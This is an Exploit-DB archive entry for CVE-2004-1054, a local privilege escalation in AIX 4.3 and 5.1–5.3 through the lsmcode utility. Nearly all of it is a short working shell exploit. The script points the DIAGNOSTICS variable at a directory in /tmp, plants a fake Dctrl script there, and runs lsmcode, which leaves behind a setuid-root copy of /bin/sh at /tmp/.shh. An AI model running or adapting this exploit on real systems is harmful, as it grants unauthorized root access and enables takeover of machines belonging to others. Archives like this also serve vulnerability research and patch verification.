AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution

2004-12-21T00:00:00
ID EDB-ID:701
Type exploitdb
Reporter cees-bart
Modified 2004-12-21T00:00:00

Description

AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution. CVE-2004-1054. Local exploit for aix platform

                                        
                                            mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]